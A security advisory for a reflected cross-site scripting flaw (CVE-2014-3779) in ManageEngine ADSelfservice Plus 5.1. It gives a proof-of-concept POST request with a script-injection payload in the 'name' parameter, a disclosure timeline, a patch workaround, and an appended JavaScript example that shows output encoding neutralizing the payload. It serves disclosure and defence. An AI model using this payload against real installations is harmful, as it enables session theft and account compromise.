Aerosol

ADSelfservice Plus 5.1 Cross Site Scripting

Security Advisory : 
Exploit Title:
Manageengine ADSelfservice Plus Reflected Cross Site Scripting (XSS)
Google dork : N/A
Exploit Author: Blessen Thomas
Date : 03-01-2015
Vendor Homepage :
Software Link : N/A

Version :

ADSelfservice Plus version 5.1, Build: 5102, Evaluation version (Trial)

Tested on :

Windows XP SP2 (host machine), Windows Server 2003 as Active Directory

CVE-2014-3779

Type of Application : Web application

Release mode : Coordinated disclosure

Vulnerability Description :
It is observed that Manageengine ADSelfservice Plus is vulnerable to reflected (non-persistent/temporary) cross site scripting attacks in the “name” parameter, and the unfiltered input is reflected to the user.


Proof of concept :

Request :

POST /GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription HTTP/1.1
Host: 192.168.163.134:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.163.134:8888/GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription
Cookie: JSESSIONIDADSSP=A4144A81CF9702C53035062DBA9CD0F3; JSESSIONIDSSO=D8EE830B96B0218E4548BA3B8ADD09DB; adsspcsrf=79cf454e-9b3f-462b-bb12-03b70cd2f469
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 161

subID=0&name=test"";</script><script>alert(0)</script><"&desc=test&domains=test.com&domainName=test.com&hidden_grps=%7B%22group%22%3A%7B%22%7B1CE0BEAF-207E-4C48-B893-8A3B0FB49CFF%7D%22%3A%22Account+Operators%22%7D%7D&hidden_usrs=%7B%22user%22%3A%7B%22%7BC4520992-9D3F-439D-82F7-0869AF3BF267%7D%22Administrator%22%7D%7D&viewMembers=on


Parameter affected:

name

Payload (Exploit Code):

"";</script><script>alert(0)</script><"

Vulnerable link:

192.168.163.134:8888/GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription



Tools used :

Mozilla Firefox browser v28.0, Burp proxy free edition v1.5


## Workaround ##
----------------
Update to newer Version 5.2 Build 5202
http://www.manageengine.com/products/self-service-password/download.html?btmMenu

## TimeLine ##
----------------------
13th Apr 2014 : Bug Discovered
15th Apr 2014 : vendor was notified by e-mail
16th Apr 2014 : Vendor response received
13th May 2014 : Vendor acknowledged and released a patch
22nd May 2014 : Mitre Team provided CVE id
03rd Jan 2015 : Public Disclosure
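
The payload above closes a string and a `</script>` tag, which suggests the "name" value is echoed inside an inline script block. The following is an added example, not vendor or advisory code: it assumes that reflection context and shows context-specific output encoding neutralizing the advisory's payload. `renderUnsafe`, `renderSafe` and the `subName` variable are hypothetical.

```javascript
// Added example, not vendor or advisory code.
// Assumption: "name" is echoed inside a double-quoted JavaScript string in an
// inline <script> block; renderUnsafe/renderSafe and subName are hypothetical.

// The "name" value from the advisory's request body.
const PAYLOAD = '"";</script><script>alert(0)</script><"';

// Encode for an HTML text or attribute context.
function encodeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Encode for a quoted JavaScript string inside <script>: every character that
// is not an ASCII letter or digit becomes \uXXXX, so neither the closing quote
// nor "</script>" survives in the emitted markup.
function encodeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

function renderUnsafe(name) {
  return '<script>var subName = "' + name + '";</script>';
}

function renderSafe(name) {
  return '<script>var subName = "' + encodeJsString(name) + '";</script>';
}

// More than one <script> opening means the value escaped its string and block.
function scriptTagCount(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// The encoded form still decodes to the original text for legitimate display.
function roundTrips(value) {
  return JSON.parse('"' + encodeJsString(value) + '"') === value;
}

console.log('unsafe script tags:', scriptTagCount(renderUnsafe(PAYLOAD)));
console.log('safe script tags:  ', scriptTagCount(renderSafe(PAYLOAD)));
console.log('html context:      ', encodeHtml(PAYLOAD));
```

If the value is instead reflected into HTML text or an attribute, `encodeHtml` is the encoder that applies; the encoder must match the context the value is written into.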
